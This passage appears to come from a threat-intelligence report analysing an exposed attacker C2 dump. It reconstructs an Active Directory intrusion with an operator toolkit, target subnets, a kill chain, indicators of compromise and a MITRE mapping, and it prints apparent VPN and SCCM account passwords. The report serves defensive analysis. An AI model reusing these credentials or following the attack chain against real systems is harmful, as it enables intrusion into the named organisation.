/mnt/sda/opt/impacket                                         Impacket suite (AD attack tools)
/home/kali/BloodHound                                         AD attack path mapping
/home/kali/CVE-2020-1472                                      ZeroLogon exploit
/home/kali/SharpRDP                                           Lateral movement via RDP
/home/kali/10.3.3.42/lib_mysqludf_sys                         MySQL UDF privilege escalation
/home/kali/10.3.3.42/CVE-2019-19576                           Target-specific exploit
/home/kali/10.1.1.27/Apache-Vulns                             Apache vulnerability exploitation
/home/kali/10.11.1.251/Wordpress-XMLRPC-Brute-Force-Exploit   WordPress XML-RPC brute force

The directory structure (/home/kali/10.3.3.42/, /home/kali/10.1.1.27/, /home/kali/10.11.1.251/) shows target-organized exploitation -- each IP gets its own directory with relevant exploits. This is a structured, methodical operator.

The squid_loot.md artifact shows a test of an HTTP exfiltration proxy:

[2026-03-07 01:36:25] FROM=127.0.0.1 UA=curl/8.15.0 RAW=LOCAL_TEST DECODED=LOCAL_TEST

This was a local test on March 7, 2026 -- the most recent timestamp in the dump -- indicating the operator was actively developing or testing exfiltration infrastructure through a Squid proxy.


6. Network Topology

The alive hosts scan reveals the target network spans multiple subnets:

Subnet              Host count   Likely function
5.63.128.0/22       8 hosts      External-facing infrastructure
109.105.128.0/17    50 hosts     Core enterprise network
109.105.131.x       7 hosts      Server cluster
109.105.133.x       7 hosts      Server cluster
109.105.144.x       4 hosts      Network infrastructure
109.105.145.x       13 hosts     Largest workstation pool
109.105.147.x       4 hosts      Secondary workstation pool
109.105.140.1       1 host       Gateway/router

The C2's internal listener addresses (10.127.196.102 and 192.168.10.222) place the operator's infrastructure in RFC 1918 space -- consistent with a VPN'd-in attack position or an internal pivot host.

Key internal addresses from the LSASS dumps:

  • backup.icg.stf / 10.154.21.66 -- Backup server (WinRM hardened)
  • 10.103.197.80 -- NTLM relay/responder position

7. Attack Chain Reconstruction

Based on the forensic artifacts, the full kill chain can be reconstructed:

1. Initial Access
   └── VPN authentication as "engineer" (iSn(wXB.$DeLO1V[k+zm)
       └── Or "support" (DblfYjZABjbzkUR)

2. C2 Establishment
   └── Adaptix v0.4 → v1.0 on 10.127.196.102:443
       └── 5 agents deployed across ICG domain

3. Credential Access
   ├── NTLMv2 capture at 10.103.197.80 → 36 NTLMv2 challenge/responses
   ├── LSASS dump on LMILLER, RTHOMPSON, JHERNANDEZ, CTHOMAS
   ├── SCCM NAA decryption → icg\ConfigMgrNAA / sdafasdfsadf2342532SDF!@!DF03
   ├── Kerberoasting → svc-sql TGS hash (RC4)
   └── DPAPI credential extraction (attempted)

4. Reconnaissance
   ├── Full domain user enumeration (admin, service and standard accounts; see Section 2)
   ├── Admin account identification (9 privileged accounts)
   ├── PowerView.ps1 from GitHub → AD enumeration
   ├── BloodHound → attack path mapping (tool present on the Kali box)
   └── Alive host scanning (58 hosts across 7+ subnets)

5. Lateral Movement
   ├── WinRM attempts to backup.icg.stf (FAILED)
   ├── engineer account NTLM sessions on 4+ workstations
   └── ConfigMgrNAA account used for remote enumeration

6. Persistence
   ├── ptadmin local account on all workstations
   ├── VPN credentials for re-entry
   └── 5 Adaptix agents with database persistence

8. Indicators of Compromise

Network Infrastructure

Indicator         Type          Context
10.127.196.102    Internal IP   Adaptix C2 listener (HTTP(S)/443, TCP/4444)
192.168.10.222    Internal IP   Adaptix C2 secondary listener / Kali box
10.103.197.80     Internal IP   NTLMv2 capture / relay position
10.154.21.66      Internal IP   Targeted backup server (backup.icg.stf)
10.124.2.26       Internal IP   Probed the C2 (TLS handshake error)
1.1.1.13          External IP   SSH source of the session in which scannerlib_poison ran
0.0.0.0:4321      Service       Adaptix teamserver (operator client) port

C2 Signatures

Indicator                 Type        Context
/profile                  URI path    Adaptix v0.4 teamserver endpoint (operator client API on port 4321, not the agent callback URI)
/endpoint                 URI path    Adaptix v1.0 teamserver endpoint (same role)
Adaptix Framework v0.4    Banner      C2 version identifier
Adaptix Framework v1.0    Banner      C2 version identifier
Extension-Kit             Directory   Adaptix BOF module path

Accounts (Compromised / Operator-Created)

Account        Domain          Type
engineer       ICG             Compromised VPN/domain account
support        ICG             Compromised VPN account
ConfigMgrNAA   ICG             SCCM NAA (password recovered)
svc-sql        ICG             Kerberoasted service account
ptadmin        Local           Shared local administrator on every dumped workstation
marin_ai       AKRON-HOLDING   Heavily targeted user
konovalov_ii   AKRON-HOLDING   Targeted user

File Artifacts

Indicator                Type                    Context
C:\ProgramData\d.dmp     File path               LSASS minidump staging location
dnsmaster                File name               Unknown payload on multiple user desktops
/tmp/scannerlib_poison   Directory               Supply chain attack working directory
revshell_header.bin      Binary (84,992 bytes)   Reverse shell payload header
PW.ps1                   File name               PowerView.ps1 renamed

Tools & Techniques (MITRE ATT&CK)

Technique                                                       ID          Evidence
External Remote Services                                        T1133       VPN access with stolen credentials
Command and Scripting Interpreter: PowerShell                   T1059.001   PowerView, Get-FileHash, SCCM NAA decryption
OS Credential Dumping: LSASS Memory                             T1003.001   Minidumps on 4 workstations
Steal or Forge Kerberos Tickets: Kerberoasting                  T1558.003   svc-sql TGS hash extraction
Unsecured Credentials                                           T1552       SCCM NAA recovered from DPAPI-protected policy blobs
Account Discovery: Domain Account                               T1087.002   Full domain user enumeration
Remote Services: Windows Remote Management                      T1021.006   Lateral movement attempts
Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay   T1557.001   36 NTLMv2 captures
Valid Accounts: Domain Accounts                                 T1078.002   engineer, ConfigMgrNAA reuse
Supply Chain Compromise: Compromise Software Supply Chain       T1195.002   scannerlib_poison on operator Kali

9. Analyst Assessment

This dump represents a mature, multi-phase intrusion by an operator (or team) with deep Active Directory expertise. Several characteristics stand out:

Professional tradecraft: The structured directory organization on the Kali box (/home/kali/<target-IP>/), the methodical credential collection, and the use of Adaptix (a less common C2 compared to Cobalt Strike or Sliver) all point to an experienced operator who prefers lower-profile tooling.

Competition crossover: The Standoff listener name and the P3nt3st2026! password strongly suggest the operator participates in professional red team competitions. Whether this dump represents a competition engagement or real-world intrusion is an open question -- the infrastructure scale (58 alive hosts, PKI, SCCM, Exchange) is consistent with either a large enterprise or a well-built competition lab.

Operational security failure: The scannerlib_poison compromise of the operator's own Kali machine is the most operationally interesting finding. Another team (or a defender running a counter-offensive) managed to execute a supply chain attack against the operator's toolchain, exfiltrating their environment, SSH keys, and git repository structure. The attacker became the attacked.

Defensive gaps in the target environment: The ICG domain exhibits several hardening failures that enabled this intrusion:

  • SCCM NAA credentials recoverable via DPAPI on any managed endpoint
  • No AES-only enforcement for Kerberos (RC4 Kerberoasting possible)
  • Shared ptadmin local account across all workstations (no LAPS rotation observed)
  • The engineer account appears to be a shared/service credential used across all workstations via NTLM
  • WinRM was the only observed hardened service (blocked on the backup server)

breakglass.intelligence -- Threat research and adversary tradecraft analysis. This report is based on forensic artifacts recovered from exposed C2 infrastructure. All credential material is presented for defensive awareness.
